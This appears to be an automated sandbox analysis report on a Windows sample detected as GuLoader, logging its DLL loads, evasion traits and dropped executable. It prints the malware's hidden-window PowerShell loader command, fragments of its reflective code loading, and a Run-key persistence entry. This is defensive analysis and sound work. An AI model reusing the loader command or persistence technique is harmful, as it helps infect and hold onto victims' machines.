Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Torpernes.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Torpernes.exe

Static file information: File size 1283968 > 1048576

Source: Torpernes.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ore.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2176303131.0000000006D84000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2181416185.0000000009DFB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Nedtllingers $Prfabrikationernes $Frugtbarhedsguden), (gongs @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Sanction = [AppDomain]::CurrentDomain.GetAssem
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($manubaliste)), $Celluloidensonnering).DefineDynamicModule($Bairnteam, $false).DefineType($Kobjlde, $Receptionschefer, [System.Multicas

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Torpernes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"
Source: C:\Users\user\Desktop\Torpernes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Torpernes.exe

Code function: 0_2_00406183 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406183

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_3_001949CC push eax; iretd	6_3_001949CD
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB2890 push eax; retf	6_2_20CB2891
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB69A3 push 331320CBh; retf	6_2_20CB69B2
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6AC3 pushad ; retf	6_2_20CB6AC6
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6AE9 push 687F20CBh; retf	6_2_20CB6AEE
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6A89 push eax; retf	6_2_20CB6A8A
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6A8F push edx; retf	6_2_20CB6A92
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6A8D push eax; retf	6_2_20CB6A8E
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6A9B push esi; retf	6_2_20CB6A9E
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6A93 push esi; retf	6_2_20CB6A9A
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6AA1 push edi; retf	6_2_20CB6AA2
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB6A68 push 00000048h; retf	6_2_20CB6A6A
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB1FBF push ds; retf	6_2_20CB1FC2
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_20CB2F00 pushad ; iretd	6_2_20CB2F01

Drops PE files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Contentious.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run crisscrossing			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run crisscrossing			Jump to behavior

Source: C:\Users\user\Desktop\Torpernes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe

API/Special instruction interceptor: Address: 2D88B49

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Memory allocated: 20DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Memory allocated: 20990000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599771	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599652	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599534	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599401	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598947	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598837	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598680	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598453	Jump to behavior
